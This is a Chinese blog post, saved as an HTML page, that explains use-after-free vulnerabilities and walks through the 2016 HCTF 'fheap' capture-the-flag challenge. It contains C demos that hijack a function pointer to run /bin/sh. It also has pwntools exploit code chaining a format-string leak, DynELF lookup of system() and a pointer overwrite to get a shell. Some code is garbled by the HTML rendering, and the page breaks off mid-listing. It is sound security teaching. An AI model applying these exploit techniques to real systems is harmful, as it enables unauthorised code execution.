<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="Linux," />





  <link rel="alternate" href="/atom.xml" title="4ct10n's Blog" type="application/atom+xml" />






<meta name="description" content="因为大作业的需求要调试一个浏览器的UAF漏洞，首先必须对UAF漏洞有个整体的了解，本篇文章主要讲解UAF造成的原因以及利用方法，这里结合2016年HCTF fheap">
<meta name="keywords" content="Linux">
<meta property="og:type" content="article">
<meta property="og:title" content="UAF (Use After Free)漏洞分析及利用">
<meta property="og:url" content="http://yoursite.com/2017/06/23/UAF (Use After Free)漏洞分析及利用/index.html">
<meta property="og:site_name" content="4ct10n&#39;s Blog">
<meta property="og:description" content="因为大作业的需求要调试一个浏览器的UAF漏洞，首先必须对UAF漏洞有个整体的了解，本篇文章主要讲解UAF造成的原因以及利用方法，这里结合2016年HCTF fheap">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://img.blog.csdn.net/20170622235950792?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:image" content="http://img.blog.csdn.net/20170623001441464?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:image" content="http://img.blog.csdn.net/20170623012118487?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:image" content="http://p6.qhimg.com/t01de9a0cdd0857a62e.png">
<meta property="og:image" content="http://img.blog.csdn.net/20170623102226965?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:image" content="http://p9.qhimg.com/t015295ad0ff28884c4.png">
<meta property="og:image" content="http://img.blog.csdn.net/20170623110422476?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:updated_time" content="2017-10-22T02:14:26.895Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="UAF (Use After Free)漏洞分析及利用">
<meta name="twitter:description" content="因为大作业的需求要调试一个浏览器的UAF漏洞，首先必须对UAF漏洞有个整体的了解，本篇文章主要讲解UAF造成的原因以及利用方法，这里结合2016年HCTF fheap">
<meta name="twitter:image" content="http://img.blog.csdn.net/20170622235950792?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2017/06/23/UAF (Use After Free)漏洞分析及利用/"/>





  <title>UAF (Use After Free)漏洞分析及利用 | 4ct10n's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">4ct10n's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-schedule">
          <a href="/schedule/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-calendar"></i> <br />
            
            日程表
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br />
            
            站点地图
          </a>
        </li>
      
        
        <li class="menu-item menu-item-commonweal">
          <a href="/404/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br />
            
            公益404
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2017/06/23/UAF (Use After Free)漏洞分析及利用/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="4ct10n">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/qq.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="4ct10n's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">UAF (Use After Free)漏洞分析及利用</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-06-23T00:20:00+08:00">
                2017-06-23
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2017-10-22T10:14:26+08:00">
                2017-10-22
              </time>
            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>因为大作业的需求要调试一个浏览器的UAF漏洞，首先必须对UAF漏洞有个整体的了解，本篇文章主要讲解UAF造成的原因以及利用方法，这里结合2016年HCTF fheap<br><a id="more"></a></p>
<p><link rel="stylesheet" type="text/css" href="http://static.blog.csdn.net/css/csdn_blog_detail.min.css"></p>
<div class="markdown_views"><blockquote><br><p>因为大作业的需求要调试一个浏览器的UAF漏洞，首先必须对UAF漏洞有个整体的了解，本篇文章主要讲解UAF造成的原因以及利用方法，这里结合2016年HCTF fheap <br><br>  题目分析起来还是有点耐人寻味。<br></p><br></blockquote><br><h1 id="0x01-uaf-原理">0x01 UAF 原理</h1><br><p>这里首先放一段简单的c代码，让大家更容易理解（linux 环境）</p><br><pre class="prettyprint"><code class=" hljs cpp"><span class="hljs-preprocessor">#include &lt;stdio.h&gt;</span><br><span class="hljs-preprocessor">#include &lt;cstdlib&gt;</span><br><span class="hljs-preprocessor">#include &lt;string.h&gt;</span><br><span class="hljs-keyword">int</span> main()<br>{<br>    <span class="hljs-keyword">char</span> <em>p1;<br>    p1 = (<span class="hljs-keyword">char</span> </em>) <span class="hljs-built_in">malloc</span>(<span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">char</span>)<em><span class="hljs-number">10</span>);<span class="hljs-comment">//申请内存空间</span><br>    <span class="hljs-built_in">memcpy</span>(p1,<span class="hljs-string">“hello”</span>,<span class="hljs-number">10</span>);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">“p1 addr:%x,%s\n”</span>,p1,p1);<br>    <span class="hljs-built_in">free</span>(p1);<span class="hljs-comment">//释放内存空间</span><br>    <span class="hljs-keyword">char</span> </em>p2;<br>    p2 = (<span class="hljs-keyword">char</span> <em>)<span class="hljs-built_in">malloc</span>(<span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">char</span>)</em><span class="hljs-number">10</span>);<span class="hljs-comment">//二次申请内存空间，与第一次大小相同，申请到了同一块内存</span><br>    <span class="hljs-built_in">memcpy</span>(p1,<span class="hljs-string">“world”</span>,<span class="hljs-number">10</span>);<span class="hljs-comment">//对内存进行修改</span><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">“p2 addr:%x,%s\n”</span>,p2,p1);<span class="hljs-comment">//验证</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}</code></pre><br><p>如上代码所示</p><br><blockquote><br><p>1.指针p1申请内存，打印其地址值 <br><br>  2.然后释放p1 <br><br>  3.指针p2申请同样大小的内存，打印p2的地址，p1指针指向的值<br><br></p><br></blockquote><br><p>Gcc编译，运行结果如下： <br><br><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170622235950792?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""> <br><br>p1与p2地址相同，p1指针释放后，p2申请相同的大小的内存，操作系统会将之前给p1的地址分配给p2，修改p2的值，p1也被修改了。<br><br></p><br><p>重温程序，看注释</p><br><hr><br><p><strong>根本原因</strong></p><br><blockquote><br><p>应用程序调用free()释放内存时，如果内存块小于256kb，dlmalloc并不马上将内存块释放回内存，而是将内存块标记为空闲状态。这么做的原因有两个：一是内存块不一定能马上释放会内核（比如内存块不是位于堆顶端），二是供应用程序下次申请内存使用（这是主要原因）。当dlmalloc中空闲内存量达到一定值时dlmalloc才将空闲内存释放会内核。如果应用程序申请的内存大于256kb，dlmalloc调用mmap()向内核申请一块内存，返回返还给应用程序使用。如果应用程序释放的内存大于256kb，dlmalloc马上调用munmap()释放内存。dlmalloc不会缓存大于256kb的内存块，因为这样的内存块太大了，最好不要长期占用这么大的内存资源。</p><br></blockquote><br><p>简单讲就是第一次申请的内存空间在释放过后没有进行内存回收，导致下次申请内存的时候再次使用该内存块，使得以前的内存指针可以访问修改过的内存。</p><br><h1 id="0x02-漏洞的简单利用">0x02 漏洞的简单利用</h1><br><p>还是先放一段程序（linux x86）</p><br><pre class="prettyprint"><code class=" hljs cpp"><span class="hljs-preprocessor">#include &lt;stdio.h&gt;</span><br><span class="hljs-preprocessor">#include &lt;stdlib.h&gt;</span><br><span class="hljs-keyword">typedef</span> <span class="hljs-keyword">void</span> (<em>func_ptr)(<span class="hljs-keyword">char</span> </em>);<br><span class="hljs-keyword">void</span> evil_fuc(<span class="hljs-keyword">char</span> command[])<br>{<br>system(command);<br>}<br><span class="hljs-keyword">void</span> echo(<span class="hljs-keyword">char</span> content[])<br>{<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">“%s”</span>,content);<br>}<br><span class="hljs-keyword">int</span> main()<br>{<br>    func_ptr <em>p1=(func_ptr</em>)<span class="hljs-built_in">malloc</span>(<span class="hljs-number">4</span><em><span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">int</span>));<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">“malloc addr: %p\n”</span>,p1);<br>    p1[<span class="hljs-number">3</span>]=echo;<br>    p1<a href="span class=&quot;hljs-string&quot;&gt;&quot;hello world\n&quot;&lt;/span"><span class="hljs-number">3</span></a>;<br>    <span class="hljs-built_in">free</span>(p1); <span class="hljs-comment">//在这里free了p1,但并未将p1置空,导致后续可以再使用p1指针</span><br>    p1<a href="span class=&quot;hljs-string&quot;&gt;&quot;hello again\n&quot;&lt;/span"><span class="hljs-number">3</span></a>; <span class="hljs-comment">//p1指针未被置空,虽然free了,但仍可使用.</span><br>    func_ptr </em>p2=(func_ptr<em>)<span class="hljs-built_in">malloc</span>(<span class="hljs-number">4</span></em><span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">int</span>));<span class="hljs-comment">//malloc在free一块内存后,再次申请同样大小的指针会把刚刚释放的内存分配出来.</span><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">“malloc addr: %p\n”</span>,p2);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">“malloc addr: %p\n”</span>,p1);<span class="hljs-comment">//p2与p1指针指向的内存为同一地址</span><br>    p2[<span class="hljs-number">3</span>]=evil_fuc; <span class="hljs-comment">//在这里将p1指针里面保存的echo函数指针覆盖成为了evil_func指针.</span><br>    p1<a href="span class=&quot;hljs-string&quot;&gt;&quot;/bin/sh&quot;&lt;/span"><span class="hljs-number">3</span></a>;<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}</code></pre><br><p>运行效果 <br><br><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170623001441464?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""> <br><br>最后成功获取shell <br><br>具体的解释注释里面很清楚，详见注释<br><br><br></p><br><h1 id="0x03-2016hctf-fheap">0x03 2016HCTF fheap</h1><br><p>用了一天的时间调试程序，这里参考了FlappyPig与官方的详细题解，但是总觉的说的不够清楚，有些地方理所当然，作为小白根本看不懂。结合着自己的漏洞调试经验写出详细的分析过程，供大家参考。</p><br><h2 id="0x1-题目分析">0x1 题目分析</h2><br><p>整个题目做下来利用到了很多知识点，这里列举一下</p><br><ol><br><li>UAF 二次释放&amp; fastbin的特性</li><br><li>64位格式化字符串漏洞</li><br><li>无libc地址泄露，DynELF</li><br></ol><br><p>主要运用的就是以上三点，首先寻找UAF可执行任意函数漏洞，其次利用puts函数寻找基址，接着利用printf格式化字符串进行内存泄露，最后UAF执行system函数</p><br><h2 id="0x2-申请释放-代码">0x2 申请&amp;释放 代码</h2><br><p>在编写的时候注意，输入顺序，利用recvuntil控制输入流程</p><br><pre class="prettyprint"><code class=" hljs python">申请代码<br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">create</span><span class="hljs-params">(size,content)</span>:</span><br>    p.recvuntil(<span class="hljs-string">“quit”</span>)<br>    p.send(<span class="hljs-string">“create “</span>)<br>    p.recvuntil(<span class="hljs-string">“size:”</span>)<br>    p.send(str(size)+<span class="hljs-string">‘\n’</span>)<br>    p.recvuntil(<span class="hljs-string">‘str:’</span>)<br>    p.send(content)<br>    p.recvuntil(<span class="hljs-string">‘\n’</span>)[:-<span class="hljs-number">1</span>]<br><br>释放代码<br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">delete</span><span class="hljs-params">(idx)</span>:</span><br>    p.recvuntil(<span class="hljs-string">“quit”</span>)<br>    p.send(<span class="hljs-string">“delete “</span>)<br>    p.recvuntil(<span class="hljs-string">‘id:’</span>)<br>    p.send(str(idx)+<span class="hljs-string">‘\n’</span>)<br>    p.recvuntil(<span class="hljs-string">‘sure?:’</span>)<br>    p.send(<span class="hljs-string">‘yes ‘</span>+<span class="hljs-string">‘\n’</span>)</code></pre><br><h2 id="0x3-uaf漏洞查找">0x3 UAF漏洞查找</h2><br><blockquote><br><p>程序自己实现了一套管理字符串的体系，但是在释放的时候用指针是否为空来判断该索引代表地方是否存放有字符串，如果指针不空，表示可以释放。但是释放完后，没有将指针置空，因此导致<strong>可以二次释放，多次释放</strong>。</p><br></blockquote><br><p><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170623012118487?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""></p><br><p>最后在释放内存之后，在delete后并没有置空，存在double free</p><br><h2 id="0x4-利用uaf修改函数地址">0x4 利用UAF修改函数地址</h2><br><p>首先我们了解一下本题的uaf漏洞，这里利用图片的形式展示一下关系</p><br><h3 id="1fastbin特性">1.fastbin特性</h3><br><pre><code>fastbin维护的chunk分九个档次，大小从16字节到80字节，每8个字节一个档次。那我们要求的0x20（32）个字节，属于48字节的档次（因为每个chunk还要加上16字节的管理区），所以我们申请0x20空间后释放的chunk被归到fastbin[5]这个链表中了。<br></code></pre><br><h3 id="2内存分布">2.内存分布</h3><br><p><img alt="这里写图片描述" src="http://p6.qhimg.com/t01de9a0cdd0857a62e.png" title=""></p><br><p>利用gbd动态调试查看结构体内存 <br><br><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170623102226965?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""> <br><br>最后一个就是freeshort函数指针<br><br></p><br><blockquote><br><p>总思路：首先是利用uaf，利用堆块之间申请与释放的步骤，形成对free_func指针的覆盖。从而达到劫持程序流的目的。具体来说，先申请的是三个字符创小于0xf的堆块，并将其释放。此时fastbin中空堆块的单链表结构如下左图，紧接着再申请一个字符串长度为0x20的字符串，此时，申请出来的堆中的数据会如下右图，此时后面申请出来的堆块与之前申请出来的1号堆块为同一内存空间，这时候输入的数据就能覆盖到1号堆块中的free_func指针，指向我们需要执行的函数，随后再调用1号堆块的free_func函数，即实现了劫持函数流的目的。</p><br></blockquote><br><p><img alt="这里写图片描述" src="http://p9.qhimg.com/t015295ad0ff28884c4.png" title=""></p><br><h2 id="0x5-泄露基址">0x5 泄露基址</h2><br><p>我们要知道堆的释放是一个先入后出的队列，也就是说你第最后一个释放，那么就地一个用，就本体而言首先申请三个堆块 ，其实两个就可以</p><br><pre class="prettyprint"><code class=" hljs sql">    <span class="hljs-operator"><span class="hljs-keyword">create</span>(<span class="hljs-number">4</span>,<span class="hljs-string">‘aa’</span>)<br>    <span class="hljs-keyword">create</span>(<span class="hljs-number">4</span>,<span class="hljs-string">‘bb’</span>)<br>    <span class="hljs-keyword">delete</span>(<span class="hljs-number">1</span>)<br>    <span class="hljs-keyword">delete</span>(<span class="hljs-number">0</span>)</span></code></pre><br><p>通过调用puts函数打印该函数的地址（一开始我不怎么理解），为什么是覆盖成2d为什么不是1a等其他puts函数的地址，自己调试一下就知道了。</p><br><pre class="prettyprint"><code class=" hljs haskell">    <span class="hljs-typedef"><span class="hljs-keyword">data</span>=’a’<em>0x10+’b’</em>0x8+’\x2d’#第一次覆盖，泄露出函数地址。</span><br>    create(<span class="hljs-number">0x20</span>,<span class="hljs-typedef"><span class="hljs-keyword">data</span>)#在这里连续创建两个堆块，从而使输入的<span class="hljs-keyword">data</span>与前面的块1公用一块内存。个堆块，从而使输入的<span class="hljs-keyword">data</span>与前面的块1公用一块内存。</span><br>    delete(<span class="hljs-number">1</span>)#这里劫持函数程序流function puts running<br>    p.recvuntil(‘b’<em><span class="hljs-number">0x8</span>)<br>    <span class="hljs-typedef"><span class="hljs-keyword">data</span>=p.recvuntil<span class="hljs-container">(‘1.’)</span>[:-2]</span><br>    print <span class="hljs-typedef"><span class="hljs-keyword">data</span></span><br>    <span class="hljs-keyword">if</span> len(<span class="hljs-typedef"><span class="hljs-keyword">data</span>)&gt;8:</span><br>        <span class="hljs-typedef"><span class="hljs-keyword">data</span>=<span class="hljs-keyword">data</span>[:8]</span><br>    <span class="hljs-typedef"><span class="hljs-keyword">data</span>=u64<span class="hljs-container">(<span class="hljs-title">data</span>.<span class="hljs-title">ljust</span>(8,’\<span class="hljs-title">x00’</span>)</span>)-0xA000000000000 #这里减掉的数可能不需要，自行调整</span><br>    print hex(<span class="hljs-typedef"><span class="hljs-keyword">data</span>)</span><br>    proc_base=<span class="hljs-typedef"><span class="hljs-keyword">data</span>-0xd2d</span><br>    print <span class="hljs-string">“proc base”</span>,hex(proc_base)</em></code></pre><br><p>找到了plt表的基地址，下面就是对于格式化字符串的利用</p><br><h2 id="6格式化字符串">6.格式化字符串</h2><br><p>我们想要知道system的地址，在没有libc的环境下，利用格式化字符串泄露内存地址从而得到system的加载地址</p><br><p>格式化字符串的洞，一开始不知道怎么发现的。但想了一下，格式化字符串的洞必须满足以下条件， <br><br>1. 用户的输入必须能打印 <br><br>2. 用户输入的字符串在printf函数栈的上方（先压栈）<br><br></p><br><p>就这两个条件我们很快可以分析出漏洞的点就在create &amp; delete 函数 <br><br>我们首先create字符串调用delete 此时freeshort地址变成了printf，可以控制打印 <br><br>但是我们的参数放在哪里呢？ <br><br>我们又发现当输入yes时yes字符串在堆栈的位置正好是printf的上方<br><br><br></p><br><p>下面找一下printf的偏移 <br><br><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170623110422476?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""><br></p><br><p>64位的格式化字符串 <a href="http://blog.csdn.net/qq_31481187/article/details/72510875" target="_blank" rel="external">参见我的另一篇博客</a> <br><br>找到偏移是9 <br><br>这时编写leak函数<br><br></p><br><pre class="prettyprint"><code class=" hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">leak</span><span class="hljs-params">(addr)</span>:</span><br>    delete_str(<span class="hljs-number">0</span>)<br>    payload = <span class="hljs-string">‘a%9$s’</span>.ljust(<span class="hljs-number">0x18</span>,<span class="hljs-string">‘#’</span>) + p64(printf_addr)<br>    create_str(<span class="hljs-number">0x20</span>,payload)<br>    sh.recvuntil(<span class="hljs-string">“quit”</span>)<br>    sh.send(<span class="hljs-string">“delete “</span>)<br>    sh.recvuntil(<span class="hljs-string">“id:”</span>)<br>    sh.send(str(<span class="hljs-number">1</span>)+<span class="hljs-string">‘\n’</span>)<br>    sh.recvuntil(<span class="hljs-string">“?:”</span>)<br>    sh.send(<span class="hljs-string">“yes.1111”</span>+p64(addr)+<span class="hljs-string">“\n”</span>)<br>    sh.recvuntil(<span class="hljs-string">‘a’</span>)<br>    data = sh.recvuntil(<span class="hljs-string">‘####’</span>)[:-<span class="hljs-number">4</span>]<br>    <span class="hljs-keyword">if</span> len(data) == <span class="hljs-number">0</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">‘\x00’</span><br>    <span class="hljs-keyword">if</span> len(data) &lt;= <span class="hljs-number">8</span>:<br>        <span class="hljs-keyword">print</span> hex(u64(data.ljust(<span class="hljs-number">8</span>,<span class="hljs-string">‘\x00’</span>)))<br>    <span class="hljs-keyword">return</span> data</code></pre><br><h2 id="0x7-泄露system地址并使用">0x7 泄露system地址并使用</h2><br><pre class="prettyprint"><code class=" hljs oxygene">     #<span class="hljs-keyword">step</span> <span class="hljs-number">5</span> leak system addr<br>    create_str(<span class="hljs-number">0</span>x20,payload)<br>    delete_str(<span class="hljs-number">1</span>)#this one can <span class="hljs-keyword">not</span> be ignore because DynELF use the delete_str() at <span class="hljs-keyword">begin</span><br>    d = DynELF(leak, base_addr, elf=ELF(<span class="hljs-string">‘./pwn-f’</span>))<br>    system_addr = d.lookup(<span class="hljs-string">‘system’</span>, <span class="hljs-string">‘libc’</span>)<br>    print <span class="hljs-string">‘system_addr:’</span>+hex(system_addr)<br><br>    #<span class="hljs-keyword">step</span> <span class="hljs-number">6</span> recover <span class="hljs-keyword">old</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">to</span> <span class="hljs-title">system</span> <span class="hljs-title">then</span> <span class="hljs-title">get</span> <span class="hljs-title">shell</span><br>    <span class="hljs-title">delete_str</span><span class="hljs-params">(0)</span><br>    <span class="hljs-title">create_str</span><span class="hljs-params">(0x20,<span class="hljs-string">‘/bin/bash;’</span>.ljust(0x18,<span class="hljs-string">‘#’</span>)</span>+<span class="hljs-title">p64</span><span class="hljs-params">(system_addr)</span>)#<span class="hljs-title">attention</span> /<span class="hljs-title">bin</span>/<span class="hljs-title">bash</span>;</span> i don`t <span class="hljs-keyword">not</span> why <span class="hljs-keyword">add</span> the <span class="hljs-string">‘;’</span><br>    delete_str(<span class="hljs-number">1</span>)<br>    sh.interactive()</code></pre><br><h2 id="0x8-完整代码">0x8 完整代码</h2><br><pre class="prettyprint"><code class=" hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> <br>sh = process(<span class="hljs-string">‘./pwn-f’</span>)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">create_str</span><span class="hljs-params">(size,str1)</span>:</span><br>    sh.recvuntil(<span class="hljs-string">“quit”</span>)<br>    sh.send(<span class="hljs-string">“create “</span>)<br>    sh.recvuntil(<span class="hljs-string">“size:”</span>)<br>    sh.send(str(size)+<span class="hljs-string">‘\n’</span>)<br>    sh.recvuntil(<span class="hljs-string">“str:”</span>)<br>    sh.send(str1)<span class="hljs-comment">#here why can not i user ‘\n’</span><br>    <span class="hljs-comment"># print ‘|’,sh.recvuntil(‘\n’)[:-1],’|’</span><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">delete_str</span><span class="hljs-params">(idn)</span>:</span><br>    sh.recvuntil(<span class="hljs-string">“quit”</span>)<br>    sh.send(<span class="hljs-string">“delete “</span>)<br>    sh.recvuntil(<span class="hljs-string">“id:”</span>)<br>    sh.send(str(idn)+<span class="hljs-string">‘\n’</span>)<br>    sh.recvuntil(<span class="hljs-string">“?:”</span>)<br>    sh.send(<span class="hljs-string">“yes”</span>+<span class="hljs-string">“\n”</span>)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">leak</span><span class="hljs-params">(addr)</span>:</span><br>    delete_str(<span class="hljs-number">0</span>)<br>    payload = <span class="hljs-string">‘a%9$s’</span>.ljust(<span class="hljs-number">0x18</span>,<span class="hljs-string">‘#’</span>) + p64(printf_addr)<br>    create_str(<span class="hljs-number">0x20</span>,payload)<br>    sh.recvuntil(<span class="hljs-string">“quit”</span>)<br>    sh.send(<span class="hljs-string">“delete “</span>)<br>    sh.recvuntil(<span class="hljs-string">“id:”</span>)<br>    sh.send(str(<span class="hljs-number">1</span>)+<span class="hljs-string">‘\n’</span>)<br>    sh.recvuntil(<span class="hljs-string">“?:”</span>)<br>    sh.send(<span class="hljs-string">“yes.1111”</span>+p64(addr)+<span class="hljs-string">“\n”</span>)<br>    sh.recvuntil(<span class="hljs-string">‘a’</span>)<br>    data = sh.recvuntil(<span class="hljs-string">‘####’</span>)[:-<span class="hljs-number">4</span>]<br>    <span class="hljs-keyword">if</span> len(data) == <span class="hljs-number">0</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">‘\x00’</span><br>    <span class="hljs-keyword">if</span> len(data) &lt;= <span class="hljs-number">8</span>:<br>        <span 